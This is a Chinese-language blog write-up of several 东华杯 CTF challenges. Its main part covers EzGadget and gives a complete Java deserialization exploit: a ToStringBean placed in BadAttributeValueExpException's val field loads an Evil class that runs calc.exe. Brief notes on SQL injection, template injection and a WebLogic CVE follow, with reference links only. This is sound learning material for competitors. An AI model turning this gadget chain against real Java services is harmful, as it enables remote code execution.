东华杯

EzGadget

这题在我调了几个cc库之后再看就很简单了,可以看另一篇文章。

找一个重写readobject和tostring得类就行了,这里找到BadAttributeValueExpException类,这个类可以调试几个cc链就明白能用来利用啥了,可参考另一篇文章,这里就是利用了tostringbean的defineclass可以读取任意字节代码,所以就只需要将BadAttributeValueExpException中val值设为ToStringBean类就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public String toString() {
ToStringBean toStringBean = new ToStringBean();
Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
Object var3 = null;

try {
var3 = clazz.newInstance();
} catch (InstantiationException var5) {
var5.printStackTrace();
} catch (IllegalAccessException var6) {
var6.printStackTrace();
}

return "enjoy it.";
}

exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import com.ezgame.ctf.tools.ToStringBean;
import com.ezgame.ctf.tools.Tools;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;

public class Exec {
public static void main(String[] args) {
try {
ToStringBean payload = new ToStringBean();

File clzFile = new File("C:\\Users\\86130\\Desktop\\Evil.class");

byte[] clzBytes = new byte[(int) clzFile.length()];

FileInputStream fis = new FileInputStream(clzFile);
fis.read(clzBytes); //read file into bytes[]
fis.close();

payload.setClassByte(clzBytes);

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder");
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, payload);

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);

out.writeUTF("gadgets");
out.writeInt(2021);





out.writeObject(badAttributeValueExpException);

//String data = byteArrayOutputStream.toString();
String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());

System.out.println(data);
byte[] b = Tools.base64Decode(data);
InputStream inputStream = new ByteArrayInputStream(b);
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021) {
objectInputStream.readObject();
}
}catch (Exception e){
e.printStackTrace();
}
}
}

Evil.java中写执行的命令就行了

1
2
3
4
5
6
7
8
9
10
11
public class Evil {
static{
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"calc.exe"});
p.waitFor();
}catch (Exception e){
e.printStackTrace();
}
}
}

Eznode

第一步登录时注入,

要求查询结果与输入的用户密码相同,自输出,第五空间考过了一次

第二步时hcb模板渲染漏洞,参考https://xz.aliyun.com/t/4695

apacheproy

打现有的cve,比赛的时候没发现。weblogic的应用,版本12.2.1.3

参考https://www.jianshu.com/p/7d14e45a96e7

OldLibrary

又是go题


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!